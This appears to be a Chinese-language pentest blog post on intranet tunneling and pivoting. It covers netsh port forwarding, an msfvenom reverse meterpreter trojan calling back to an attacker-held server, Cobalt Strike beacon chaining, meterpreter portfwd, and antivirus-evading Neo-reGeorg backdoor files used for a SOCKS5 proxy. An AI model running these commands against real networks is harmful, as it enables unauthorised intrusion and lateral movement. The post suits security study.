通常都是正向连接,但如果有防火墙拦截外来请求,那就考虑反向连接,目标机器主动发起的连接,一般防火墙不会拦截
1.端口转发与映射
作用:比如我们用kali进行攻击,拿到外网服务器权限后,无法从kali直接去访问内网机器的服务,这时候利用端口转发映射的方法,
将内网主机的服务端口映射转发到外网服务器上的某一个端口,这样我们可以通过kali访问外网服务器的端口就可以访问到内网机
器。
1)netsh端口映射到外网服务器
netsh interface portproxy add v4tov4 listenport=7777(外网服务器) connectaddress=ip(内网服务器) connectport=80(内网服务器)
相关命令:
清楚指定规则:netsh interface portproxy delete v4tov4 listenport=7777(外网服务器的端口)
查看转发规则:netsh interface portproxy show all
清楚s所有规则:netsh interface portproxy reset
2)netsh端口映射到msf监听(反向连接-一半)
先生成msf木马,lhost是外网服务器的地址,在内网服务器上运行木马后,会有一个会话到外网服务器,只是没有监听该端口,看
不到shell框,然后在外网服务器添加一条端口转发规则,将kali的msf监听端口映射到本机上shell会话的端口,这样,当shell弹回
来之后,msf也会接听到shell会话,貌似是全反向,其实是一半反向。
msfvenom -p windows/meterpreter/reverse_http lhost=外网服务器ip lport=端口1 -f exe -o 文件名
netsh interface portproxy add v4tov4 listenport=7777(外网服务器) connectaddress=kali的ip connectport=端口1
msf进行hander模块,设置lhost,lport=7777,payload,run
在内网机器上运行木马
kali会接收到shell会话
2.cs工具多层内网上线
1)正向
通过tcp监听器生成木马或者powershell命令,在外网服务器上执行,外网服务器上线
通过外网服务器beacon连接内网服务器,内网服务器也会上线
2)反向
外网服务器上线后,在会话基础上生成一个监听器,然后利用该监听器生成木马,到内网服务器上执行,则内网服务器会反向连
接外网服务器,然后内网服务器也会上线。
3.msf中的portfwd(端口转发/重定向)
在得到meterpreter会话后,添加端口转发
portfwd add -l 8080(想要反弹回来的端口,反弹到攻击机上) -r ip(内网目标机器) -p port(内网目标机器服务端口)
portfwd flush清除掉所有规则
4.Neo-reGeorg工具(是免杀的)
python neo.py generate -k wang会生成几个后门文件,放到外网服务器上
运行Python neo.py -k wang -u url地址 则就会生成代理
在kali上选用socks5代理,设置脚本会显的端口,就可以直接访问内网上的服务
或者也可以在本地代理文件中加入socks5代理来访问,/etc/proxychains.conf 执行命令proxychains namp -sS 内网服务器地址
网络攻防渗透之内网隧道
于 2023-06-30 14:26:20 首次发布